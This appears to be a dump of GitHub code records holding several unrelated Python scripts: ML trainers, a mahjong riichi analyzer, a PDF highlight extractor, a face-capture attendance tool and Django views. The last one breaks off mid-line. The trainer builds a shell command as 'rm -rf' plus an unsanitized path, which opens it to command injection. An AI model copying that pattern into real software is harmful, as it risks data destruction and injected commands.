config=args,\n data_loader=trainer_data)\n\n if args.preview_training_output:\n model_wrapper.callbacks.append(PreviewOutput(trainer_data, args.preview_validation_steps, args))\n\n print(model_wrapper.model.summary())\n\n try:\n model_wrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n\n model_wrapper.save()\n\n\ndef main():\n args = parse_inputs()\n\n print(args)\n\n args.num_gpus, args.cuda_devices = allocate_tf_gpu_devices(args.cuda_devices)\n args.is_multi_gpu = args.num_gpus > 1\n\n # Handle restarting and resuming training\n if args.restart:\n print('Restarting training from scratch.')\n os.system('rm -rf {}'.format(args.model_path))\n\n if not os.path.isdir(args.model_path):\n os.system('mkdir -p {}'.format(args.model_path))\n else:\n print('Resuming training on model_path {}'.format(args.model_path))\n\n base_model = get_model(args.model_name)\n\n if args.do_crossval:\n cross_validate(base_model, args)\n else:\n trainer_data = TrainerData(args)\n trainer_data.split_data()\n\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n\n # Setup model\n model_wrapper = base_model(model_dir=args.model_path,\n name=args.model_name,\n config=args,\n data_loader=trainer_data)\n\n model_wrapper.compile({'metrics': ['accuracy', distance]})\n\n if args.preview_training_output:\n model_wrapper.callbacks.append(\n PreviewOutput(trainer_data, validation_steps=args.preview_validation_steps, config=args))\n\n print(model_wrapper.model.summary())\n\n try:\n model_wrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n\n model_wrapper.save()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fk128/sarcopenia-ai","sub_path":"sarcopenia_ai/apps/slice_detection/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"66"} +{"seq_id":"73312685011","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os,re\nfrom datetime import datetime\n\nprint(\"--- --- begin --- ---\")\n\nheader = [\"---\",\"\",\"layout: page\",\"title: 笔记\",\"update: \"+datetime.now().strftime(\"%Y-%m-%d\")+\" +0800\",\"\",\"---\",\"个人整理自用的技术向笔记文章,比较零碎所以不用博文的形式更新\"]\n\ndir = [x for x in os.listdir(\".\") if os.path.isdir(x)]\nindex = open(\"index.md\",\"w\")\n\nfor x in header:\n index.write(x+\"\\n\")\nfor x in sorted(dir):\n index.write(\"## \"+x+\"\\n\\n\")\n os.chdir(x)\n file = os.listdir(\".\")\n for y in sorted(file):\n if not y.endswith('.md'):\n continue\n pattern = re.compile(u\"title: (.*)\")\n for line in open(y,\"r\"):\n #print(line)\n result = pattern.findall(line)\n if result:\n print(result[0])\n index.write(\"《\"+result[0]+\"》\\n\\n\")\n os.chdir(\"..\")\n index.write(\"\\n\")\n\nprint(\"--- --- done --- ---\")\n\n","repo_name":"ypingcn/ypingcn.github.io","sub_path":"notes/index-generate.py","file_name":"index-generate.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"17550244940","text":"import csv\n\n### 商品クラス\nclass Item:\n def __init__(self,item_code,item_name,price):\n self.item_code = item_code\n self.item_name = item_name\n self.price = price\n\n def get_price(self):\n return self.price\n\n## オーダークラス\nclass Order:\n def __init__(self,item_master):\n self.item_order_list = []\n self.item_master = item_master\n self.item_count = 0\n self.item_sum_price = 0\n self.change = 0\n\n def add_item_order(self,item_code,quantity):\n self.item_order_list.append([item_code,quantity])\n\n def view_item_list(self):\n for master in self.item_master:\n for item in self.item_order_list:\n # 注文一覧の各コードをマスターと比較\n if master.item_code == item[0]:\n print(f\"商品コード:{item[0]}|価格:{master.price}|個数:{item[1]}\")\n self.item_count = self.item_count + int(item[1])\n self.item_sum_price = self.item_sum_price + int(item[1]) * int(master.price)\n\n\n def exist_item_master(self,order_code):\n for item in self.item_master:\n if (item.item_code == order_code):\n return True\n\n return False\n\n def total_order(self):\n print(\"\\n#--------------#\")\n print(f\"個数=>{self.item_count}|合計金額=>{self.item_sum_price}\")\n print(\"#--------------#\")\n\n def check_payment(self,diposit):\n self.change = int(diposit) - self.item_sum_price\n\n if self.change < 0:\n return True\n return False\n\n def payment(self):\n print(f\"お釣りの金額は{self.change}です\")\n\n\n## メイン処理\ndef main():\n # アイテムマスタ\n master_csv = \"item_master.csv\"\n csv_file = open(master_csv, 'r')\n # CSVデータを読み込む\n item_list = csv.reader(csv_file)\n # ヘッダーをスキップする\n header = next(item_list)\n\n item_master = []\n for item in item_list:\n item_master.append(Item(item[0],item[1],item[2]))\n\n # オーダーのインスタンス作成し、アイテムマスターをセットする\n order = Order(item_master)\n\n order_code = \"\"\n quantity = 0\n while True:\n order_code = input(\"商品コードを入力してください(オーダーストップはend)=>\")\n if (order_code == 'end'):\n print('注文を終わります')\n break\n\n quantity = input(\"個数を入力してください=>\")\n if (order.exist_item_master(order_code) == False):\n print(\"マスタに存在しません、再度商品コードを入力してください\")\n continue\n\n order.add_item_order(order_code,quantity)\n\n # オーダー表示\n order.view_item_list()\n\n # 合計金額表示\n order.total_order()\n\n while True:\n # 支払金額を入力\n diposit = input(\"支払金額を入力してください=>\")\n isMinus = order.check_payment(diposit)\n\n if isMinus == True:\n print(\"金額が不足していますので、再度お支払いください\")\n continue\n else:\n order.payment()\n break\n\nif __name__ == \"__main__\":\n main()","repo_name":"KAZURYAN/python-study-0","sub_path":"study_four/kadai6.py","file_name":"kadai6.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8620165865","text":"import fitz\nfrom webcolors import rgb_to_name\nfrom scipy.spatial import KDTree\nfrom webcolors import (\n CSS3_HEX_TO_NAMES,\n hex_to_rgb,\n)\n\n\ndef main():\n doc = fitz.open(\"sample.pdf\")\n print(len(doc))\n # List to store all the highlighted texts\n highlight_text = []\n for pageNumber in range(0, len(doc)):\n page = doc[pageNumber]\n highlights = []\n\n annot = page.firstAnnot\n while annot:\n if annot.type[0] == 8:\n colours = annot.colors\n print(colours)\n if len(colours.get('stroke')) == 3:\n rgb = [round(x * 250) for x in colours.get('stroke')]\n # named_colour = rgb_to_name(rgb, spec='css3')\n named_colour = convert_rgb_to_names(rgb)\n print(named_colour)\n highlights.append((annot.rect, named_colour))\n annot = annot.next\n #\n all_words = page.get_text_words()\n for h in highlights:\n sentence = []\n for word in all_words:\n if fitz.Rect(word[0:4]).intersects(h[0]):\n if not sentence:\n first_word_number = word[7]\n sentence.append(word[4])\n last_word_number = word[7]\n highlight_text.append((\" \".join(sentence), h[1], first_word_number, last_word_number))\n print_text(highlight_text)\n\n\ndef convert_rgb_to_names(rgb_tuple):\n # a dictionary of all the hex and their respective names in css3\n css3_db = CSS3_HEX_TO_NAMES\n names = []\n rgb_values = []\n for color_hex, color_name in css3_db.items():\n names.append(color_name)\n rgb_values.append(hex_to_rgb(color_hex))\n\n kdt_db = KDTree(rgb_values)\n distance, index = kdt_db.query(rgb_tuple)\n return names[index]\n\n\ndef print_text(highlighted_text):\n with open('output.txt', 'w') as output:\n for sentence in highlighted_text:\n colour = sentence[1]\n if colour == 'khaki':\n output.write(\"-\" + sentence[0] + \" \" + str(sentence[2]) + \" \" + str(sentence[3]) + \"\\n\")\n elif colour == 'tomato':\n output.write(\" -\" + sentence[0] + \" \" + str(sentence[2]) + \" \" + str(sentence[3]) + \"\\n\")\n elif colour == 'plum':\n output.write(\" -\" + sentence[0] + \" \" + str(sentence[2]) + \" \" + str(sentence[3]) + \"\\n\")\n\n# def sort_notes(highlighted_text):\n# for sentence in highlighted_text:\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tjirmaine/pdf_Summary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35334467096","text":"#########################################\n# camera_module.py #\n# MANSEDS Self-Landing Rocket Code #\n# Contributors: Matthew Asker #\n# Uses data written to a file from #\n# barometer to indicate when to start #\n# and stop recording using the PiCamera #\n#########################################\n\nimport picamera # imports module from picamera needed\nimport time\n\nrecording = 0 # a boolean variable to be set to 0 when camera is not recording and 1 when camera is recording\n\nwith picamera.PiCamera() as camera:\n\n camera.resolution = (640,480)\n\n while True:\n\n f = open('video_start.txt','r') # create an object f containing the file written to by the barometer\n start = f.read() # reads the text from the file and stores in start\n \n print(start)\n f.close();\n\n if start == \"Going down!\\n\" and recording == 0: # if the rocket is travelling downwards and recording has not yet been started\n camera.start_recording('video.h264') # uses PiCamera method for camera object to start recording\n recording = 1 # indicate that recording is started\n elif start == \"The rocket has landed!\\n\" and recording == 1: # if the rocket is stationary then it has landed\n camera.stop_recording() # uses PiCamera method for camera object to stop recording\n time.sleep(2)\n","repo_name":"MANSEDS/Rocketry-2018-2nd-Stage","sub_path":"camera_module_depreciated.py","file_name":"camera_module_depreciated.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8858066841","text":"from .log_hand_analyzer import LogHandAnalyzer\nfrom collections import defaultdict, Counter\nimport util.analysis_utils as ut\nimport util.shanten as sh\nfrom lxml import etree\nimport pandas as pd\n\n# Discard reading from the Riichi tile, for first riichi\n# Turn? Tedashi or tsumogiri?\n# Safe tile, terminal, 28, middle tile or dora? What about safe tile after dropping a joint?\n# What if the tile is connected to something in the discards?\n\noutput = \"./results/RiichiTile.csv\"\njoints = [(1,1), (2,2), (3,3), (4,4), (5,5), # Pair Drop \n (1,2), (2,1), (2,4), (4,2), (1,3), (3,1), (3,5), (5,3), # Kanchan Drop\n (2,3), (3,2), (3,4), (4,3), (4,5), (5,4)] # Ryanmen Drop\ncombos = [(1,7), (7,1), (2,8), (1,9), # 6 gap and 7 gap for good measure\n (1,6), (6,1), (2,7), (7,2), # Aida yon ken\n (1,4), (4,1), (2,5), (5,2), (3,6), (6,3)] # Suji drop\n\nclass RiichiTile(LogHandAnalyzer):\n def __init__(self):\n super().__init__()\n self.hand_before = None\n self.tedashi = [[], [], [], []]\n\n self.riichitile_correlation_df = pd.DataFrame(0,index=[1,2,3,4,5,6,7,8,9],columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"count\"]) #Given riichi on X, chance Y is in the discards\n self.riichitile_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n self.riichitile_jointdrop_df = pd.DataFrame(0,index = joints,\n columns = [1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X2 and X1 in discards, relative danger of tiles\n self.riichitile_combos_df = pd.DataFrame(0,index = combos,\n columns = [1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X2 and X1 in discards, relative danger of tiles\n self.riichitile_urawait_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[\"matagisuji\", \"urasuji\",\"urakanchan\",\"uratanki\",\"urashanpon\",\"uracomplex\", \"not ura\", \"count\"]) #Chance of type of wait around riichi tile, given riichi tile\n self.turn_urawait_df = pd.DataFrame(0, index = range(0,18), columns=[\"matagisuji\", \"urasuji\",\"urakanchan\", \"uratanki\",\"urashanpon\",\"uracomplex\", \"not ura\", \"count\"]) #Chance of type of wait around riichi tile, given turn\n self.riichitile_firstrow_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n self.riichitile_secondrow_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n self.riichitile_thirdrow_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n\n def RoundStarted(self, init):\n self.tedashi = [[], [], [], []]\n return super().RoundStarted(init)\n \n def TileDiscarded(self, who, tile, tsumogiri, element):\n self.tedashi[who].append(not tsumogiri)\n super().TileDiscarded(who, tile, tsumogiri, element)\n\n def RiichiCalled(self, who, step, element):\n if step == 1:\n self.hand_before = self.hands[who].copy()\n self.hand_before[self.last_draw[who]] -= 1\n\n if step == 2:\n if self.turn > 17:\n self.end_round = True\n return\n \n ### Discard pool\n discarded_joints = []\n for i in range(len(self.discards[who])):\n d = self.discards[who][i]\n if d > 30: continue\n if d % 10 <= 5: \n for j in joints:\n if j in discarded_joints: continue\n if j[0] == d % 10:\n for ii in range(i+1, len(self.discards[who])-1): # Attempt to find other side of the joint\n dd = self.discards[who][ii]\n if j[1] == dd % 10 and d // 10 == dd // 10 and self.tedashi[who][ii]: # Joint found.\n discarded_joints.append(j)\n\n ### Before riichi\n hand_before_shanten = sh.calculateMinimumShanten(self.hand_before)\n uke_before, wait_before = sh.calculateUkeire(self.hand_before, baseShanten=hand_before_shanten)\n shape_before = ut.GroupShanten(hand_before_shanten, uke_before)\n\n ### Wait\n hand = self.hands[who]\n uke, wait = sh.calculateWait(hand)\n wait_class = WaitClass(uke, wait, hand)\n\n tanyao = True\n for tile in hand:\n if hand[tile] > 0:\n if tile % 10 == 1 or tile % 10 == 9 or tile > 30:\n tanyao = False\n break\n\n ## Dora & Dora discarded\n aka_drawn = [i*10 + 5 for i, x in enumerate(self.aka) if x == who]\n aka = []\n aka_discarded = []\n for a_d in aka_drawn:\n if hand[a_d] > 0:\n aka.append(a_d)\n else:\n aka_discarded.append(a_d)\n\n dora = 0\n dora_discarded = 0\n for d in self.dora:\n dora += hand[d]\n dora_discarded += self.discards[who].count(d)\n\n dsoba_wait = False\n for w in wait:\n for d in self.dora:\n if w // 10 == d // 10:\n if w >= d-2 and w <= d+2:\n dsoba_wait = True\n break\n\n ### Riichi tile\n riichi_tile = self.discards[who][-1]\n riichi_tile_class = RiichiTileClass(riichi_tile, self.dora, aka_discarded)\n ura_wait_class = UraWaitSorter(riichi_tile, wait, wait_class)\n tsumogiri = self.discards[who][-1] == self.last_draw[who]\n\n # First joint that is +- 2 of riichi tile \n riichi_joint = []\n if riichi_tile < 30 and riichi_tile % 10 <= 5:\n for i in range(len(self.discards[who])-1,-1,-1):\n d = self.discards[who][i]\n if d > 30: continue\n if d % 10 <= 5: \n for j in joints:\n if j[0] == d % 10:\n if j[1] == riichi_tile % 10 and d // 10 == riichi_tile // 10 and not tsumogiri: # Joint found.\n riichi_joint.append(j)\n break\n\n riichi_combos = []\n if riichi_tile < 30:\n for i in range(len(self.discards[who])-1):\n d = self.discards[who][i]\n if d > 30: continue\n for c in combos:\n if c[0] == d % 10:\n if c[1] == riichi_tile % 10 and d // 10 == riichi_tile // 10 and not tsumogiri: # Joint found.\n riichi_combos.append(c)\n\n ### Record data\n if riichi_tile < 30 and self.turn <= 6:\n self.riichitile_firstrow_df.loc[riichi_tile%10, \"count\"] += 1\n for w in wait:\n if w > 30:\n waittile_class = \"Honor\"\n elif riichi_tile // 10 == w // 10:\n waittile_class = w % 10\n else:\n waittile_class = w % 10 + 10 \n self.riichitile_firstrow_df.loc[riichi_tile%10, waittile_class] += 1\n\n elif riichi_tile < 30 and self.turn >= 12:\n self.riichitile_thirdrow_df.loc[riichi_tile%10, \"count\"] += 1\n for w in wait:\n if w > 30:\n waittile_class = \"Honor\"\n elif riichi_tile // 10 == w // 10:\n waittile_class = w % 10\n else:\n waittile_class = w % 10 + 10 \n self.riichitile_thirdrow_df.loc[riichi_tile%10, waittile_class] += 1\n\n elif riichi_tile < 30:\n self.riichitile_secondrow_df.loc[riichi_tile%10, \"count\"] += 1\n for w in wait:\n if w > 30:\n waittile_class = \"Honor\"\n elif riichi_tile // 10 == w // 10:\n waittile_class = w % 10\n else:\n waittile_class = w % 10 + 10 \n self.riichitile_secondrow_df.loc[riichi_tile%10, waittile_class] += 1\n\n if riichi_tile < 30:\n self.riichitile_urawait_df.loc[riichi_tile%10, ura_wait_class] += 1\n self.riichitile_urawait_df.loc[riichi_tile%10, \"count\"] += 1\n self.turn_urawait_df.loc[self.turn, ura_wait_class] += 1\n self.turn_urawait_df.loc[self.turn, \"count\"] += 1\n \n # Log\n # print(f\"Riichi turn {self.turn} Round {self.round[0]}\")\n # print(f\"Hand before: {ut.parseAmberNotation(self.hand_before)}, Shanten/Shape: {shape_before}, Drawn tile: {ut.parseAmberNotation(list=[self.last_draw[who]])}\")\n # print(f\"Discards: {ut.parseAmberNotation(list=self.discards[who])}\")\n # print(f\"Tenpai: {ut.parseAmberNotation(hand)}, Riichi on: {ut.parseAmberNotation(list=[riichi_tile])}, Class: {riichi_tile_class}, Tsumogiri: {tsumogiri}\")\n # print(f\"Wait on: {ut.parseAmberNotation(list=wait)}, Ura Wait class: {ura_wait_class}, Tanyao: {tanyao}\")\n # print(f\"Dora: {ut.parseAmberNotation(list=self.dora)}, Have # dora: {dora}, Have # aka: {ut.parseAmberNotation(list=aka)}, Dorasoba wait: {dsoba_wait}\")\n # print(f\"Aka discarded: {aka_discarded}, Dora discarded: {dora_discarded}\")\n # input()\n\n self.end_round = True\n\n def PrintResults(self):\n self.riichitile_firstrow_df.to_csv(output, mode='a', index_label='first row')\n self.riichitile_secondrow_df.to_csv(output, mode='a', index_label='second row')\n self.riichitile_thirdrow_df.to_csv(output, mode='a', index_label='third row')\n\n with open(output, \"a\", encoding=\"utf8\") as f:\n f.write(f\"Total riichi count,{self.riichi_counts}\\n\")\n f.write(f\"Total riichi tanyao,{self.riichi_tanyao}\\n\")\n f.write(f\"Total riichi dorawait,{self.riichi_dorawait}\\n\")\n f.write(f\"Total riichi turn,{self.riichi_turn}\\n\")\n\n\ndef WaitClass(uke, wait, hand):\n if len(wait) == 1:\n if wait[0] < 30:\n if hand[wait[0]]>0 and hand[wait[0]-1] + hand[wait[0]+1] < 3: #Cases where you have the tile and waiting on it, but it's kanchan eg 22344, 12234\n return \"tanki\"\n else:\n return \"kanchan\"\n else:\n return \"tanki\"\n\n if len(wait) == 2:\n if all(i//10 == wait[0]//10 for i in wait) and wait[0] + 3 == wait[1] and uke >= 5:\n return \"ryanmen\"\n else:\n if uke > 4:\n return \"complex\"\n else:\n return \"shanpon\"\n \n if len(wait) == 3:\n if all(i//10 == wait[0]//10 for i in wait) and wait[0] + 3 == wait[1] and wait[1] + 3 == wait[2]:\n return \"sanmenchan\"\n \n if len(wait) >= 3:\n return \"complex\"\n\ndef RiichiTileClass(tile, dora, aka_discarded):\n if tile in aka_discarded: \n return \"Aka\"\n if tile in dora:\n return \"Dora\"\n if tile > 30:\n return \"Honor\"\n if tile % 10 == 1 or tile % 10 == 9:\n return \"19\"\n if tile % 10 == 2 or tile % 10 == 8:\n return \"28\"\n else:\n return \"34567\"\n \ndef TsumogiriSorter(hand, uke, wait, wait_class, tanyao, who, round, oya):\n if wait_class == \"tanki\":\n return \"tanki\"\n \n #Check for sanshoku. At least 2 of 3 sanshokus present & 2 of the other tile\n for i in range(1,8):\n set = 0\n joint = 0\n for j in range(3):\n count = 0\n if hand[j*10+i] > 0:\n count += 1\n if hand[j*10+i+1] > 0:\n count += 1\n if hand[j*10+i+2] > 0:\n count += 1\n if count == 3:\n set += 1\n if count == 2:\n joint += 1\n if set + joint == 3 and set >= 1:\n return \"sanshoku\"\n \n #Check for san/suuankou chance. 2 triplets present.\n triplets = 0\n for i in range(38):\n if hand[i] >= 3:\n triplets += 1\n if triplets >= 2:\n return \"sanankou\"\n \n #Tanyao/iipeikou bad wait, too hard to check for pinfu\n if tanyao:\n return \"tanyao\"\n if len(wait) == 1:\n if hand[wait[0]-1] >= 2 and hand[wait[0]] >= 1 and hand[wait[0]+1] >= 2: #Common 33455 bad wait ippeikou\n return \"iipeikou\"\n \n #Yakuhai triplet or pair\n for i in range(31,38):\n if isYakuhai(i, who, round, oya):\n if hand[i] == 3:\n return \"yakuhai triplet\"\n if hand[i] == 2:\n return \"yakuhai pair\"\n\n if (wait_class == \"ryanmen\" or wait_class == \"sanmenchan\") and triplets == 0:\n return \"pinfu\" #Good wait probably pinfu, bad wait probably no yaku\n else:\n return \"no yaku\"\n \ndef isYakuhai(tile, who, round, oya):\n yaku = 0\n if tile >= 35:\n yaku += 1\n if round <= 3 and tile == 31:\n yaku += 1\n if round >= 4 and tile == 32:\n yaku += 1\n\n if tile - ((who-oya)%4) == 31:\n yaku += 1\n\n return yaku\n\ndef UraWaitSorter(riichi_tile, wait, wait_class):\n if wait_class == \"tanki\":\n if wait[0] // 10 == riichi_tile // 10:\n if wait[0] <= riichi_tile + 2 and wait[0] >= riichi_tile - 2:\n return \"uratanki\"\n elif wait_class == \"shanpon\":\n for w in wait:\n if w // 10 == riichi_tile // 10:\n if w <= riichi_tile + 2 and w >= riichi_tile - 2:\n return \"urashanpon\"\n elif wait_class == \"complex\":\n for w in wait:\n if w // 10 == riichi_tile // 10:\n if w <= riichi_tile + 2 and w >= riichi_tile - 2:\n return \"uracomplex\"\n elif wait_class == \"kanchan\":\n if wait[0] // 10 == riichi_tile // 10:\n if wait[0] <= riichi_tile + 2 and wait[0] >= riichi_tile - 2:\n return \"urakanchan\"\n else:\n if wait[0] < riichi_tile and wait[-1] > riichi_tile:\n return \"matagisuji\"\n if wait[0] == riichi_tile + 1 or wait[-1] == riichi_tile - 1:\n return \"urasuji\"\n return \"not ura\"","repo_name":"chienshyong/houou-statistics","sub_path":"analyzers/riichi_tile.py","file_name":"riichi_tile.py","file_ext":"py","file_size_in_byte":14929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72771483090","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 26 00:03:51 2019\r\n\r\n@author: kartik\r\n\"\"\"\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport sqlite3\r\n\r\nfaceDetector = cv2.CascadeClassifier(\"C:\\\\Users\\\\kartik\\\\Anaconda3\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml\");\r\nname=input(\"enter your name\")\r\nroll=input(\"enter your roll num\")\r\nconn=sqlite3.connect(\"f.db\")\r\np=(name, roll)\r\ncursor=conn.execute(\"INSERT INTO attendace VALUES (?, ?, NULL)\", p)\r\n\r\nconn.commit()\r\n\r\nos.mkdir('D://PROG//dataset//{}'.format(name))\r\nk=0\r\ncap = cv2.VideoCapture(0);\r\n\r\nwhile(True):\r\n _, frame = cap.read();\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces = faceDetector.detectMultiScale(gray, 1.2, 5)\r\n for(x, y, w, h) in faces:\r\n cv2.imwrite('D://PROG//dataset//{}//{}.jpg'.format(name,k),image)\r\n k +=1\r\n cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255,0), 2)\r\n print (len(faces))\r\n cv2.imshow(\"Face\", frame)\r\n if(cv2.waitKey(1)== ord('q')):\r\n break\r\n \r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"kartikmalhotra/Attendence-Monitoring-System","sub_path":"atten1.py","file_name":"atten1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1658712097","text":"from django.shortcuts import render, redirect\nfrom .models import Phone\n\n\ndef index(request):\n return redirect('catalog')\n\n\ndef show_catalog(request):\n template = 'catalog.html'\n phones = list(Phone.objects.all())\n if request.GET:\n if request.GET['sort'] == 'name':\n phones.sort(key=lambda x: x.name)\n if request.GET['sort'] == 'min_price':\n phones.sort(key=lambda x: x.price)\n if request.GET['sort'] == 'max_price':\n phones.sort(reverse=True|False, key=lambda x: x.price)\n context = {'phones': phones}\n return render(request, template, context)\n\n\ndef show_product(request, slug):\n template = 'product.html'\n phone = Phone.objects.get(slug=slug)\n context = {'phone': phone}\n return render(request, template, context)\n","repo_name":"kxrxll/dj-orm","sub_path":"phones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42459682673","text":"# -*- coding: utf-8 -*-\n\n\"\"\"A class to load training triples and convert them to a TriplesFactory object that\ncan be used by PyKEEN.\"\"\"\n\nfrom typing import Tuple\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nimport pickle\n\nfrom pykeen.triples import TriplesFactory\n\nfrom .triples_numeric_literals_factory import TriplesNumericLiteralsFactory\n\n\nclass DataLoader:\n def __init__(self, triples_dir: Path, use_features: str) -> None:\n self.triples_dir = triples_dir\n self.use_features = use_features\n self.load_metadata()\n return\n\n def load_metadata(self) -> None:\n with open(f\"{self.triples_dir}/metadata.pkl\", \"rb\") as f:\n metadata = pickle.load(f)\n for key, value in metadata.items():\n setattr(self, key, value)\n return\n\n def get_triples_factory(self) -> TriplesFactory:\n df = pd.DataFrame(np.load(Path(self.triples_dir) / \"triplets.npy\"))\n if self.use_features == \"categorical\":\n mask = df[\"rel\"] >= self.n_num_attr\n df = df[mask]\n df = df.astype(np.int64)\n elif self.use_features == \"numerical\":\n mask = df[\"rel\"] < self.n_num_attr\n df = df[mask]\n tf = TriplesFactory(df.to_numpy(), self.entity_to_idx, self.rel_to_idx)\n tf.n_num_rel = self.n_num_attr\n return tf\n\n def get_numeric_triples_factory(self) -> TriplesNumericLiteralsFactory:\n \"\"\"Only used with DistMult + LiteralE\"\"\"\n df = pd.DataFrame(np.load(Path(self.triples_dir) / \"triplets.npy\"))\n assert self.use_features == \"all\"\n mask = df[\"rel\"] >= self.n_num_attr\n triples, num_triples = df[mask].to_numpy(dtype=np.int64), df[~mask].to_numpy()\n triples[:, 1] -= self.n_num_attr\n non_num_rels = list(self.rel_to_idx.keys())[self.n_num_attr :]\n num_rels = list(self.rel_to_idx.keys())[:self.n_num_attr]\n non_num_rel_to_idx = {rel: idx for idx, rel in enumerate(non_num_rels)}\n num_rel_to_idx = {rel: idx for idx, rel in enumerate(num_rels)}\n tf = TriplesFactory(triples, self.entity_to_idx, non_num_rel_to_idx)\n num_tf = TriplesNumericLiteralsFactory(\n triples_factory=tf,\n numeric_triples=num_triples,\n num_rel_to_idx=num_rel_to_idx,\n )\n return num_tf\n\n def get_hrt(self) -> Tuple[np.array]:\n df = np.load(Path(self.triples_dir) / \"triplets.npy\")\n return df[\"head\"], df[\"rel\"], df[\"tail\"]\n\n def get_dataframe(self) -> pd.DataFrame:\n df = np.load(Path(self.triples_dir) / \"triplets.npy\")\n df = pd.DataFrame.from_records(df)\n if self.use_features == \"categorical\":\n mask = df[\"rel\"] >= self.n_num_attr\n df = df[mask]\n df = df.astype(np.int64)\n return df\n","repo_name":"alexis-cvetkov/KEN","sub_path":"KEN/dataloader/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"15577089523","text":"#!/usr/bin/env python\n# Following the tutorial from\n# https://www.tensorflow.org/get_started/mnist/pros\nimport datetime\nimport random\nimport math\nimport gzip\n\nimport tensorflow as tf\nfrom tensorflow import flags\nfrom tensorflow.contrib import learn\nimport tensorflow.contrib.image\nfrom tensorflow.contrib.learn.python.learn.estimators import model_fn as model_fn_lib\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors as tferrors\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.framework import ops\nimport numpy as np\nfrom scipy import ndimage\n\nimport process_data\n\nimage_vector_distort = tf.load_op_library('bin/image_vector_distort.so')\n\nFLAGS = flags.FLAGS\nflags.DEFINE_bool('train', False, 'Train model. Evaluates if false.')\nflags.DEFINE_integer('epochs', 15, 'Number of steps to train.')\nflags.DEFINE_bool(\n 'clean', True,\n 'Train new model from scratch instead of improving existing model.')\nflags.DEFINE_bool('summaries', False, 'Log detailed image summaries.')\n\n# Model parameters.\nflags.DEFINE_integer('columns', 7, 'Columns in multi-column convnet.')\nflags.DEFINE_bool('dropout', True, 'Enable dropout in training.')\n\n# Enable normal logging.\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\ndef with_dependencies(dependencies, op):\n \"\"\"Returns `op` with dependencies added.\n\n Arguments:\n dependencies: List of tensorflow ops.\n op: Tensorflow op.\n \"\"\"\n with tf.control_dependencies(dependencies):\n return tf.identity(op)\n\n\ndef conv_pool_layer(\n inputs,\n filters,\n conv_padding='valid', # no padding\n conv_sample_size=5, # Convolve size\n pool_size=2,\n name=None):\n \"\"\"Convolve2D and max-pool layer.\"\"\"\n with tf.variable_scope(name):\n conv = tf.layers.conv2d(\n inputs=inputs,\n filters=filters,\n kernel_size=[conv_sample_size] * 2,\n padding=conv_padding,\n activation=tf.nn.relu,\n bias_initializer=tf.truncated_normal_initializer(stddev=0.1),\n name='conv')\n\n pool = tf.layers.max_pooling2d(\n inputs=conv,\n pool_size=[pool_size] * 2,\n strides=pool_size,\n padding='same',\n name='pool')\n\n return pool\n\n\ndef cnn_model_fn(features, labels, mode):\n \"\"\"Model definition.\"\"\"\n input_layer = tf.reshape(\n features['images'], [-1, 28, 28, 1], name='input/layer')\n\n input_layer = tf.image.resize_images(\n input_layer,\n [28, 28])\n\n # Conv-pool layers.\n conv_pool1 = 